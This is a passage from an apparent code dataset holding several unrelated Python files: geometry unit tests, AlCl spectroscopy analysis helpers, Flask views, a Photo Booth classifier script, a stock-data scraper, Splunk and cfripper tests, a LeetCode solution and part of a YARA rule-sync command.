0.001)\r\n self.assertAlmostEqual(p[2].x, -1, 0.001)\r\n self.assertAlmostEqual(p[2].y, 1, 0.001)\r\n self.assertAlmostEqual(p[3].x, -1, 0.001)\r\n self.assertAlmostEqual(p[3].y, -1, 0.001)\r\n\r\n def testConversion(self):\r\n p = self.p.copy()\r\n self.assertEqual(list(p), p)\r\n self.assertTrue(isinstance(list(p), list))\r\n self.assertEqual(tuple(p), p)\r\n self.assertTrue(isinstance(tuple(p), tuple))\r\n\r\n def testPickle(self):\r\n 
testrect = flamingo.flmath.Rect((-1, 1), 2, 2)\r\n testrect_str = pickle.dumps(testrect)\r\n loaded_rect = pickle.loads(testrect_str)\r\n self.assertEqual(testrect, loaded_rect)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.Rect, b)\r\n\r\n\r\n##-------- Test Suite\r\ntestpow = unittest.TestLoader().loadTestsFromTestCase(TestPow)\r\ntestdistance = unittest.TestLoader().loadTestsFromTestCase(TestDistance)\r\ntestmidpoint = unittest.TestLoader().loadTestsFromTestCase(TestMidpoint)\r\ntestarea = unittest.TestLoader().loadTestsFromTestCase(TestArea)\r\ntestnormalized = unittest.TestLoader().loadTestsFromTestCase(TestNormalizeAngle)\r\ntestnormalizepoly = unittest.TestLoader().loadTestsFromTestCase(TestNormalizePoly)\r\ntestsimplify = unittest.TestLoader().loadTestsFromTestCase(TestPolySimplify)\r\ntestvector = unittest.TestLoader().loadTestsFromTestCase(TestVector)\r\ntestpolygon = unittest.TestLoader().loadTestsFromTestCase(TestPolygon)\r\ntestrect = unittest.TestLoader().loadTestsFromTestCase(TestRect)\r\n\r\ntestsuite = unittest.TestSuite((testpow, testdistance, testmidpoint, testarea,\r\n testnormalized, testnormalizepoly, #testsimplify,\r\n testvector, testpolygon, testrect))\r\n\r\nif __name__ == \"__main__\":\r\n unittest.TextTestRunner(verbosity=2).run(testsuite)\r\n","sub_path":"tests/unit/flmath_test.py","file_name":"flmath_test.py","file_ext":"py","file_size_in_byte":25565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"509764202","text":"import numpy as np\nfrom configparser import ConfigParser\nimport ast\nimport matplotlib.pyplot as plt\n\nc = 299792458\nkB = 1.3806482e-23\nh_planck = 6.63607e-34\namu = 1.66e-27\n\n\ndef get_pop(J, B, T, N0 = 1):\n # returns rotational population distribution\n\n pop = N0 * (2*J+1) * np.exp(-B * h_planck * J*(J+1)/(kB*T))\n\n return pop / (np.sqrt(kB*T/(2*h_planck*B)) - 1.0/2.0)\n\ndef get_doppler(T, f0):\n # returns Doppler width for 27Al35Cl\n\n return np.sqrt(8*kB*T*np.log(2)/((35+27)*amu*c**2)) * f0\n\n\ndef simple_gauss(x, x0, A, w):\n return A * np.exp( -(x-x0)**2/(2*w**2) )\n\n\ndef av(arr, no_of_avg):\n # for 1D array\n if len(arr.shape)==1:\n hlp = np.zeros([int(arr.shape[0]/no_of_avg)])\n\n for k in range(len(hlp)):\n for m in range(no_of_avg):\n hlp[k] += arr[no_of_avg*k + m]\n\n return hlp/no_of_avg\n\n if len(arr.shape)==2: \n\n # for 2D array\n hlp = np.zeros([int(arr.shape[0]/no_of_avg), arr.shape[1]])\n\n for k in range(len(hlp)):\n for m in range(no_of_avg):\n hlp[k] += arr[no_of_avg*k + m, :]\n\n return hlp/no_of_avg\n\ndef read_in_config(f):\n \n config = ConfigParser()\n config.read(f)\n\n sensor_ids = config.sections()\n # make dictionary out of config\n\n sensors = {}\n\n for s in sensor_ids:\n opts = config.options(s)\n \n sensors[s] = {}\n for o in opts:\n sensors[s][o] = config.get(s, o)\n\n return sensors\n\ndef moving_average(a, n=3) :\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n\n\n\ndef scale_coeff(M, mass1, mass2, scale = True):\n\n # scale or unscale Dunham coefficients with the reduced mass\n mu = (mass1 * mass2)/(mass1 + mass2)\n\n if scale == False:\n \n # return U_kl = 1/mu^(-k/2 - l) * M_kl\n U = []\n for k in range(len(M)):\n hlp = []\n for l in range(len(M[k])):\n hlp.append(1.0/mu**(-k/2.0 - l) * M[k][l])\n U.append(hlp)\n \n return U\n else:\n\n # return Y_kl = mu^(-k/2 - l) * M_kl\n Y = []\n for k in range(len(M)):\n hlp = []\n for l in range(len(M[k])):\n hlp.append(mu**(-k/2.0 - l) * M[k][l])\n Y.append(hlp)\n \n return Y\n\n\ndef energy(Y, v, J):\n\n e = 0.0\n for k in range(len(Y)):\n for l in range(len(Y[k])):\n\n e += Y[k][l] * (v + 0.5)**k * ( J * (J + 1.0) )**l\n\n return e\n\ndef get_transitions(Yg, Ye, ve, vg, cnt_freq, df = 100e9, T = 10, Jmax = 1, no_of_points = 3000, real_amplitudes = True, pressure_broadening = 1.0, isotope_abundance = 1.0):\n\n Jg_arr = np.arange(0, Jmax+1) \n Je_arr = np.arange(1, Jmax+1)\n \n w = get_doppler(pressure_broadening * T, cnt_freq)\n \n nus = np.linspace(cnt_freq - df, cnt_freq + df, no_of_points)\n \n spectrum_P = np.zeros(len(nus))\n spectrum_Q = np.zeros(len(nus))\n spectrum_R = np.zeros(len(nus))\n \n f_P = []\n f_Q = []\n f_R = []\n \n for Jg in Jg_arr:\n for Je in Je_arr:\n \n # only dipole transitions\n eng = 100*c*(energy(Ye, ve, Je) - energy(Yg, vg, Jg))\n \n # apply population of ground states\n if real_amplitudes:\n A = get_pop(Jg, 100*c*Yg[0][1], T)\n else:\n A = 1.0\n\n\n if Je - Jg == -1: \n spectrum_P += simple_gauss(nus, eng, A, w)\n f_P.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'r' )\n \n if Je - Jg == 0: \n spectrum_Q += simple_gauss(nus, eng, A, w)\n f_Q.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'g' )\n \n if Je - Jg == +1: \n spectrum_R += simple_gauss(nus, eng, A, w)\n f_R.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'b' )\n \n \n f_P = np.array(f_P)\n f_Q = np.array(f_Q)\n f_R = np.array(f_R)\n\n return (nus, 
[isotope_abundance * spectrum_P, isotope_abundance * spectrum_Q, isotope_abundance * spectrum_R], [f_P, f_Q, f_R])\n\ndef get_spec_lines(Yg, Ye, ve, vg, nus, line_type = 'Q', T = 1, Jmax = 1, real_amplitudes = True, cnt_freq = 100.0 * c * 38237.0):\n\n Jg_arr = np.arange(0, Jmax+1)\n Je_arr = np.arange(0, Jmax+1)\n \n w = get_doppler(T, cnt_freq)\n \n spectrum = np.zeros(len(nus))\n \n for Jg in Jg_arr:\n for Je in Je_arr:\n \n # only dipole transitions\n \n eng = 100*c*(energy(Ye, ve, Je) - energy(Yg, vg, Jg))\n \n # apply population of ground states\n if real_amplitudes:\n A = get_pop(Jg, 100*c*Yg[1][0], T)\n else:\n A = 1.0\n \n if Je - Jg == -1 and line_type == 'P': \n spectrum += simple_gauss(nus, eng, A, w)\n \n if Je - Jg == 0 and line_type == 'Q': \n spectrum += simple_gauss(nus, eng, A, w)\n \n if Je - Jg == +1 and line_type == 'R': \n spectrum += simple_gauss(nus, eng, A, w)\n \n \n\n return (nus, spectrum)\n\n\n\ndef plot_spectrum(nus, s, ve = 0, vg = 0, T = 0, cnt_freq = 0, style = '-', txt = '', abundance = 1.0):\n \n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[0], 'r' + style, label = 'P' + txt)\n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[1], 'g' + style, label = 'Q' + txt)\n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[2], 'b' + style, label = 'R' + txt)\n\n plt.xlabel(\"Frequency (GHz) - {0:6.6f} THz\".format(cnt_freq/1e12))\n\n plt.title(\"AlCl transitions @ T = {2:2} K for v = {0} -> v' = {1} (J->J')\".format(vg, ve, T))\n\n plt.xlim(np.min(nus-cnt_freq)/1e9, np.max(nus-cnt_freq)/1e9)\n\n #plt.ylim(-0.1, 3.0)\n\n plt.legend()\n\ndef plot_transitions(f, cnt_freq = 0.0, cut = None, style = '-', txt = ''):\n \n if cut == None:\n cut = len(f[0])\n\n plt.plot((f[0][0:cut] - cnt_freq)/1e9, 'ro' + style, label = 'P' + txt)\n plt.plot((f[1][0:cut] - cnt_freq)/1e9, 'gx' + style, label = 'Q' + txt)\n plt.plot((f[2][0:cut] - cnt_freq)/1e9, 'bd' + style, label = 'R' + txt)\n\n plt.xlabel('Rotational number J')\n plt.ylabel(\"Frequency (GHz) - {0:6.6f} THz\".format(cnt_freq/1e12))\n\n plt.legend(loc = 'upper right')\n\n\n\ndef combine_data(x_arr, y_arr, arr = [], sort = True):\n\n # concatenates data arrays\n\n if len(arr) == 0:\n arr = range(len(x_arr))\n\n x = []\n y = []\n for n in arr:\n\n x.extend(x_arr[n])\n y.extend(y_arr[n])\n\n x = np.array(x)\n y = np.array(y)\n\n if sort:\n\n ind = np.argsort(x)\n\n x = x[ind]\n y = y[ind]\n\n return (x, y)\n\ndef get_reduced_dunham():\n\n # ground state from Bernath\n Ug = [\n #[0.0,3.59517408,-5.802142e-5],\n [0.0,3.711517408,-5.802142e-5],\n [1880.202,-9.575654e-2],\n [-32.012],\n [3.95186e-1],\n [-4.802e-3]\n ]\n \n # excited state\n Ue = [\n #[38251.101190451634 - (39.6e9+15.7e9-55.3e9)/100/c, 3.6400046656060443, 0.00], \n [38251.101190451634 - (39.6e9+15.7e9-55.3e9)/100/c, 3.695, 0.00], \n #[38237.483145, 3.64, 0.00], \n [1784.3665982617565, 0.0*-0.2344361133562231],\n [-114.5238709407005], \n [17.527497484431063], \n [-6.316749292366754]\n ]\n\n # these fit well for both transitions v=0 -> v=0 and v=1 -> v=1\n # they are far off from what Brian sees, though\n Ug = [[0, 3.697689639, -0.00004110220051, 0, 0, 0], [1880.20433, \\\n 0.04887253993, 0, 0, 0, 0], [-32.01271, 0, 0, 0, 0, 0], [0.0395499, \\\n 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]\n\n #Ue = [[38255.63489, 3.718219212, 0.00273806453, 0, 0, 0], [1729.598167, \\\n #-0.06421374131, 0, 0, 0, 0], [60.74391688, 0, 0, 0, 0, 0], \\\n #[-180.1417929, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, \\\n #0]]\n \n Ue = [\n [ 
38254.32476191586,3.736511543882381 ],\n [ 1752.053766623087,-0.15954589427560947 ],\n [ -57.906191069099314 ],\n ]\n\n ## less orders\n #Ug = [[0, 3.703932569, -0.00004535349545], [1880.20433, 0, 0], \\\n #[-32.01271, 0, 0]]\n #Ue = [[38255.41096, 3.710086911, 0.002721267251], [1736.170635, 0, 0], [0, \\\n #0, 0]]\n\n #Ug = [[0, 3.058994665, -0.00008158000278], [1880.20433, 5.063896456, 0], \\\n #[-32.01271, 0, 0]]\n #Ue = [[38255.45438, 3.140849542, 0.002912864012], [1735.832448, \\\n #4.464122387, 0], [0, 0, 0]]\n\n return (Ug, Ue)\n\ndef get_dunham(Ug, Ue):\n\n massAl = 26.98153841\n massCl_35 = 34.96885269\n massCl_37 = 36.96590258\n\n # ground state\n Yg35 = scale_coeff(Ug, massAl, massCl_35, scale = True)\n Yg37 = scale_coeff(Ug, massAl, massCl_37, scale = True)\n\n # excited state\n Ye35 = scale_coeff(Ue, massAl, massCl_35, scale = True)\n Ye37 = scale_coeff(Ue, massAl, massCl_37, scale = True)\n\n return (Yg35, Ye35, Yg37, Ye37)\n\n\n\ndef read_in_data(data, offset_avg = 10, datafolder = '/Users/boerge/Software/offline_data/', moving_avg_no = 0):\n \n basefolder = str(data['date'])\n\n basefilename = datafolder + basefolder + '/' + basefolder + '_'\n\n f_freqs = basefilename + str(data['time']) + '_set_points'\n f_act_freqs = basefilename + str(data['time']) + '_act_freqs'\n f_ch0 = basefilename + str(data['time']) + '_ch0_arr'\n f_ch1 = basefilename + str(data['time']) + '_ch1_arr'\n f_ch2 = basefilename + str(data['time']) + '_ch2_arr'\n f_ch3 = basefilename + str(data['time']) + '_ch3_arr'\n\n config_file = basefilename + str(data['time']) + '_conf'\n\n conf = read_in_config(config_file)\n\n print('Analyzing file ... ' + f_freqs)\n \n freqs = np.genfromtxt(f_freqs, delimiter=\",\")\n act_freqs = np.genfromtxt(f_act_freqs, delimiter=\",\")\n ch0 = np.genfromtxt(f_ch0, delimiter=\",\")\n ch1 = np.genfromtxt(f_ch1, delimiter=\",\")\n ch2 = np.genfromtxt(f_ch2, delimiter=\",\")\n ch3 = np.genfromtxt(f_ch3, delimiter=\",\")\n\n # get number of averages\n no_of_avg = int(len(freqs)/len(np.unique(freqs)))\n\n print('Found ' + str(no_of_avg) + ' averages.')\n\n # take the averages\n freqs = av(freqs, no_of_avg)\n act_avg_freqs = av(act_freqs, no_of_avg)\n ch0 = av(ch0, no_of_avg)\n ch1 = av(ch1, no_of_avg)\n ch2 = av(ch2, no_of_avg)\n ch3 = av(ch3, no_of_avg)\n\n # subtracting the DC offset\n offset_avg_points = offset_avg\n for k in range(ch0.shape[0]):\n ch0[k, :] = ch0[k, :] - np.mean(ch0[k, -offset_avg_points:-1])\n ch1[k, :] = ch1[k, :] - np.mean(ch1[k, -offset_avg_points:-1])\n ch2[k, :] = ch2[k, :] - np.mean(ch2[k, -offset_avg_points:-1])\n ch3[k, :] = ch3[k, :] - np.mean(ch3[k, -offset_avg_points:-1])\n\n # get frequency scan interval in terms of absolute frequencies\n laser_offset = 3.0 * np.float(conf['offset_laser1']['val']) * 1e12\n\n act_freqs = 3.0 * act_freqs * 1e12\n act_avg_freqs = 3.0 * act_avg_freqs * 1e12\n freqs = 3.0 * freqs * 1e6\n \n # UV frequency = 3x IR frequency\n freqs = freqs + laser_offset\n\n t_steps = np.float(conf['step_size']['val'])*1e-6\n\n t_count = np.float(conf['scope_count']['val'])\n\n times = np.linspace(0, t_steps * t_count, np.int(t_count))\n\n times = times / 1e-3\n \n # apply moving time average \n if moving_avg_no > 0:\n \n times = moving_average(times, n = moving_avg_no)\n\n ch0_avg = np.zeros([ch0.shape[0], len(times)])\n ch1_avg = np.zeros([ch1.shape[0], len(times)])\n ch2_avg = np.zeros([ch2.shape[0], len(times)])\n ch3_avg = np.zeros([ch3.shape[0], len(times)])\n \n for k in range(ch0.shape[0]):\n ch0_avg[k, :] = 
moving_average(ch0[k, :], n = moving_avg_no)\n            ch1_avg[k, :] = moving_average(ch1[k, :], n = moving_avg_no)\n            ch2_avg[k, :] = moving_average(ch2[k, :], n = moving_avg_no)\n            ch3_avg[k, :] = moving_average(ch3[k, :], n = moving_avg_no)\n\n        return (times, freqs, act_freqs, act_avg_freqs, [ch0_avg, ch1_avg, ch2_avg, ch3_avg], laser_offset)\n\n    else:\n        \n        return (times, freqs, act_freqs, act_avg_freqs, [ch0, ch1, ch2, ch3], laser_offset)\n\n\n\ndef print_dunham():\n\n    (Ug, Ue) = get_reduced_dunham()\n    \n    (Yg35, Ye35, Yg37, Ye37) = get_dunham(Ug, Ue)\n    \n\n    print('Dunham coefficients')\n    print('-'*30)\n    #for v in range(len(Yg35)):\n    #    for l in range(len(Yg35[v])):\n\n    print(\"Yg35_00 = {0:8.3f} THz\".format(Yg35[0][0]*100*c/1e12))\n    print(\"Yg35_01 = {0:8.3f} GHz\".format(Yg35[0][1]*100*c/1e9))\n    print(\"Yg35_02 = {0:8.3f} kHz\".format(Yg35[0][2]*100*c/1e3))\n    print(\"Yg35_10 = {0:8.3f} THz\".format(Yg35[1][0]*100*c/1e12))\n    print(\"Yg35_20 = {0:8.3f} GHz\".format(Yg35[2][0]*100*c/1e9))\n    print(\"Yg35_11 = {0:8.3f} MHz\".format(Yg35[1][1]*100*c/1e6))\n    print()\n    print(\"Ye35_00 = {0:8.3f} THz\".format(Ye35[0][0]*100*c/1e12))\n    print(\"Ye35_01 = {0:8.3f} GHz\".format(Ye35[0][1]*100*c/1e9))\n    print(\"Ye35_02 = {0:8.3f} kHz\".format(Ye35[0][2]*100*c/1e3))\n    print(\"Ye35_10 = {0:8.3f} THz\".format(Ye35[1][0]*100*c/1e12))\n    print(\"Ye35_20 = {0:8.3f} GHz\".format(Ye35[2][0]*100*c/1e9))\n    print(\"Ye35_11 = {0:8.3f} MHz\".format(Ye35[1][1]*100*c/1e6))\n\n\n\n\ndef print_matrix(U, txt = None):\n\n    if not txt is None:\n        print(txt + ' = [')\n    else:\n        print('[')\n    for k in range(len(U)):\n        print(U[k], end = '')\n        #for l in range(len(U[k])):\n        #    print(U[k][l])\n        if k < len(U):\n            print(',')\n\n    print(']\\n')\n    \n\n\n","sub_path":"boerge/Spectroscopy_Paper_Analysis/v11/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"440548678","text":"# coding=utf-8\n\"\"\"\nLogic for dashboard related routes\n\"\"\"\nfrom flask import Blueprint, render_template, flash, redirect, url_for, escape\nfrom .forms import LogUserForm, AddUserForm, AddPostFrom\nfrom ..data.database import db\nfrom ..data.models import LogUser, Posts, Uzivatel\nblueprint = Blueprint('public', __name__)\n\n\n\n\n@blueprint.route('/', methods=['GET'])\n\ndef index():\n return render_template('public/index.tmpl', title='Home')\n\n\n\n@blueprint.route('/loguserinput',methods=['GET', 'POST'])\ndef InsertLogUser():\n form = LogUserForm()\n if form.validate_on_submit():\n LogUser.create(**form.data)\n return render_template(\"public/LogUser.tmpl\", form=form)\n\n@blueprint.route('/loguserlist',methods=['GET'])\ndef ListuserLog():\n pole = db.session.query(LogUser).all()\n return render_template(\"public/listuser.tmpl\",data = pole)\n\n@blueprint.route('/form', methods=['GET', 'POST'])\ndef InsertAddUser():\n form = AddUserForm()\n if form.validate_on_submit():\n Uzivatel.create(**form.data)\n flash(\"Data uspesne pridana!\", 'info')\n return redirect(url_for('public.render'))\n return render_template(\"public/addUser.tmpl\", form=form)\n\n@blueprint.route('/render')\ndef render():\n zaznamy = Uzivatel.listall()\n return render_template(\"public/vypis.tmpl\", data = zaznamy)\n\n@blueprint.route('/addPost/', methods=['GET', 'POST'])\ndef InsertAddPost(rodic):\n form = AddPostFrom()\n pole=db.session.query(Uzivatel).filter(Uzivatel.id==rodic).first()\n\n if form.validate_on_submit():\n if pole:\n form.user_id.data=rodic\n Posts.create(**form.data)\n flash(\"Data uspesne pridana!\", \"info\")\n else:\n flash(\"Data nepridabna uz!\", \"error\")\n\n return redirect(url_for('public.renderPost(1000)'))\n return render_template(\"public/add.tmpl\", form=form)\n\n#@blueprint.route('/posts')\ndef renderPost(id):\n zaznamy = Uzivatel.listpostall('Franta')\n #zaznamy = Prvni.all()\n return render_template(\"public/posts.tmpl\", data = zaznamy)\n\n","sub_path":"src/public/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"61730381","text":"import os\nimport shlex\nimport shutil\nimport crop_resize_faces\nimport original\nimport synthetic\nimport running_total\nimport time\nimport appscript\n\n#Clear screen and open Photo Booth app, wait to take picture\nos.system('clear')\nos.system('osascript -e \\\"tell application \\\\\\\"Photo Booth\\\\\\\" to activate\\\"')\ntime.sleep(10)\n\n#Close Photo Booth app (to ensure photos are deleted from display)\nos.system('osascript -e \\'quit app \\\"Photo Booth\\\"\\'')\n\n#Move photo into directory and pre-process\npath1 = \"Pictures/Photo Booth Library/Pictures/\"\npath2 = \"Documents/College/Senior Year/Fall/FURI/presentation/photo.jpg\"\nusr = \"../../../../../../\"\nfiles = os.listdir(usr + path1)\nshutil.move(usr+path1+files[0], usr + path2)\ncrop_resize_faces.main()\n\n#Run on original classifier and update totals\nprint(\"Original data:\")\nresult = original.main()\nif result:\n\trunning_total.og_f_eng()\nelse:\n\trunning_total.og_f_noneng()\n\n#Run on augmented classifier and update totals\nprint(\"Synthetic data:\")\nresult = synthetic.main()\nif result:\n\trunning_total.aug_f_eng()\nelse:\n\trunning_total.aug_f_noneng()\n\n#Display totals in new window\n#appscript.app('Terminal').do_script('cd Documents/College/Senior\\ Year/Fall/FURI/presentation/ && python running_total.py')\n\n\n","sub_path":"f_run_image.py","file_name":"f_run_image.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"471006487","text":"# coding=utf-8\n\nimport re\nfrom lxml import etree\nimport requests\nimport time\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport json\nimport sys\nimport re\nimport os\nimport copy\nimport time\n\nimport Stocks\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass THSBillboard:\n def __init__(self):\n self.Url = \"http://data.10jqka.com.cn/market/lhbcjmx/code/%s\"\n\n def Spider(self, code, fileName):\n html = requests.get(self.Url%code)\n bDate = time.strptime('2015-01-01','%Y-%m-%d')\n if (html != None):\n dates = self.GetDates(html)\n if(dates != None):\n for date in dates:\n dDate = time.strptime(date,'%Y-%m-%d')\n\n if(dDate < bDate):\n continue\n\n url = self.Url%code + \"/date/%s/ajax/1\"%date\n html = requests.get(url)\n if(html != None):\n data = self.Parse(html, date)\n if(data != None):\n self.WriteCSV(data, code, fileName)\n\n\n def Parse(self, html, date):\n selector = etree.HTML(html.text)\n data = self.GetBlockTrade(selector, date)\n return data\n\n\n def GetDates(self, html):\n dates = []\n selector = etree.HTML(html.text)\n pattern = '/html/body/div[2]/div[5]/div/select/option'\n trSelector = selector.xpath(pattern)\n\n for item in trSelector:\n if(trSelector != None and len(trSelector) > 0):\n st = item.xpath('string()')\n if(st != None):\n dates.append(st)\n return dates\n\n\n def GetBlockTrade(self, selector, date):\n divPatterns = \"//div[@class='lhb_rank_list']\"\n divSelector = selector.xpath(divPatterns)\n\n pattern = u\"】(.*?)$\"\n\n data = []\n for item in divSelector:\n partSelector = item.xpath(\"div[@class='jj_ggcjmx_title']\")\n title = partSelector[0].xpath('string()').replace('\\n','').replace('\\t','').replace(',','').replace('\\r','').strip()\n titleType = re.findall(pattern, title)[0]\n trPattern = 'table/tbody/tr'\n trs = item.xpath(trPattern)\n noOne = 0\n for i in range(0, len(trs)):\n row = []\n tdSelectors = trs[i].xpath(\"td\")\n if(len(tdSelectors) == 1):\n continue\n j = 0\n row.append(date)\n row.append(titleType)\n for j in range(0, len(tdSelectors)):\n st = tdSelectors[j].xpath('string()')\n if(st != None):\n st = st.replace('\\n','').replace('\\t','').replace(',','').replace('\\r','').replace(' ','').strip()\n if(j==0):\n if(st == '1'):\n noOne = noOne + 1\n if(noOne == 2):\n st = '-' + st\n if(j == 1):\n strs = re.findall(\"\\d+(.*?)$\", st)\n if(len(strs) > 0):\n st = strs[0]\n row.append(st)\n data.append(row)\n return data\n\n def WriteCSV(self, data, code, fileName):\n with open(fileName, \"a\") as fileStock:\n for row in data:\n fileStock.write(\"%s,%s\"%(\"同花顺\", code))\n for item in row:\n fileStock.write(\",%s\"%item)\n fileStock.write(\"\\n\")\n fileStock.flush()\n\n\nif __name__ == '__main__':\n #codes = Stocks.StockList.GetStockCodes()\n codes = ['000058']\n\n fileName = u\"d://股价异动_同花顺.csv\"\n\n if os.path.exists(fileName):\n os.remove(fileName)\n\n startTime = time.time()\n\n ths = THSBillboard()\n for code in codes:\n ths.Spider(code, fileName)\n print(\"%s:OK\"%code)\n\n endTime = time.time()\n print(\"单线程时间%.2f秒\"%(endTime - startTime))","sub_path":"Data/Billboard.py","file_name":"Billboard.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"64232431","text":"import os\nimport sys\n\npath_prepend = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(os.path.join(path_prepend))\nfrom base.splunk_handler import SplunkOutputHandler\n\n\ndef test_stream_output():\n handler = SplunkOutputHandler('https://systest-auto-master:8089', 'admin', 'changed', 'main', 'aaa', 'bbb')\n handler.set_flush_threshold(15)\n for i in range(10):\n handler.stream_event('I am {0}'.format(str(i)))\n\n\nif __name__ == '__main__':\n test_stream_output()\n","sub_path":"test/test_splunk_handler.py","file_name":"test_splunk_handler.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"443766310","text":"\"\"\"\nCopyright 2018-2020 Skyscanner Ltd\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use\nthis file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nfrom pytest import fixture\n\nfrom cfripper.rules import PartialWildcardPrincipalRule\nfrom tests.utils import get_cfmodel_from\n\n\n@fixture()\ndef good_template():\n return get_cfmodel_from(\"rules/PartialWildcardPrincipalRule/good_template.json\").resolve()\n\n\n@fixture()\ndef bad_template():\n return get_cfmodel_from(\"rules/PartialWildcardPrincipalRule/bad_template.json\").resolve()\n\n\ndef test_no_failures_are_raised(good_template):\n rule = PartialWildcardPrincipalRule(None)\n result = rule.invoke(good_template)\n\n assert result.valid\n assert len(result.failed_rules) == 0\n assert len(result.failed_monitored_rules) == 0\n\n\ndef test_failures_are_raised(bad_template):\n rule = PartialWildcardPrincipalRule(None)\n result = rule.invoke(bad_template)\n\n assert result.valid\n assert len(result.failed_rules) == 0\n assert len(result.failed_monitored_rules) == 4\n assert result.failed_monitored_rules[0].rule == \"PartialWildcardPrincipalRule\"\n assert result.failed_monitored_rules[0].reason == \"PolicyA contains an unknown principal: 123445\"\n assert result.failed_monitored_rules[1].rule == \"PartialWildcardPrincipalRule\"\n assert (\n result.failed_monitored_rules[1].reason\n == \"PolicyA should not allow wildcard in principals or account-wide principals \"\n \"(principal: 'arn:aws:iam::123445:12345*')\"\n )\n assert result.failed_monitored_rules[2].rule == \"PartialWildcardPrincipalRule\"\n assert result.failed_monitored_rules[2].reason == \"PolicyA contains an unknown principal: 123445\"\n assert result.failed_monitored_rules[3].rule == \"PartialWildcardPrincipalRule\"\n assert (\n result.failed_monitored_rules[3].reason\n == \"PolicyA should not allow wildcard in principals or account-wide principals \"\n \"(principal: 'arn:aws:iam::123445:root')\"\n )\n","sub_path":"tests/rules/test_PartialWildcardPrincipal.py","file_name":"test_PartialWildcardPrincipal.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"29879415","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n n = len(nums)\n p = 1\n result = []\n result.append(p)\n # from 1 to n -1\n for i in range (1, n):\n result.append(p * nums[i - 1])\n p = p * nums[i - 1]\n # from n - 2 to 0\n p = 1\n for i in range(n - 1, -1, -1):\n result[i] = p * result[i]\n p = p * nums[i]\n return result\n","sub_path":"product_array_except_self.py","file_name":"product_array_except_self.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"413987198","text":"import git\nimport requests\nimport marko\nimport yara\nfrom pathlib import Path\nfrom git import Repo\nfrom bs4 import BeautifulSoup\nfrom django.db import transaction\nfrom django.conf import settings\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth import get_user_model\nfrom orochi.ya.models import Ruleset, Rule\n\nfrom multiprocessing.dummy import Pool as ThreadPool\n\n\nclass Command(BaseCommand):\n help = \"Sync Yara Rules\"\n\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__(*args, **kwargs)\n self.updated_rules = []\n\n def compile_rule(self, item):\n \"\"\"\n Check if single rule is valid\n \"\"\"\n path, ruleset_pk = item\n ruleset = Ruleset.objects.get(pk=ruleset_pk)\n rule, _ = Rule.objects.get_or_create(path=path, ruleset=ruleset)\n compiled = False\n # TRY LOADING COMPILED, IF FAILS TRY LOAD\n try:\n _ = yara.load(str(path))\n compiled = True\n self.stdout.write(\"\\t\\tCOMPILED\")\n except yara.Error:\n try:\n _ = yara.compile(str(path), includes=False)\n except yara.SyntaxError as e:\n self.stdout.write(\n self.style.ERROR(\"\\t\\tCannot load rule {}!\".format(path))\n )\n self.stdout.write(\"\\t\\t\\t{}\".format(e))\n rule.enabled = False\n rule.compiled = compiled\n rule.save()\n\n def down_repo(self, item):\n \"\"\"\n Clone or pull remote repos\n \"\"\"\n rulesetpath, rulesetname, description = item\n ruleset, created = Ruleset.objects.update_or_create(\n name=rulesetname, url=rulesetpath, defaults={\"description\": description}\n )\n\n repo_local = \"{}/{}\".format(\n settings.LOCAL_YARA_PATH, ruleset.name.lower().replace(\" \", \"_\")\n )\n\n if created or not ruleset.cloned:\n # GIT CLONE\n try:\n repo = Repo.clone_from(\n ruleset.url,\n to_path=repo_local,\n )\n self.stdout.write(\"\\tRepo {} cloned\".format(ruleset.url))\n ruleset.cloned = True\n ruleset.save()\n self.updated_rules += [\n (x, ruleset.pk)\n for x in Path(repo_local).glob(\"**/*\")\n if x.suffix.lower() in settings.YARA_EXT\n ]\n except git.exc.GitCommandError as e:\n self.stdout.write(self.style.ERROR(\"\\tERROR: {}\".format(e)))\n ruleset.enabled = False\n ruleset.save()\n 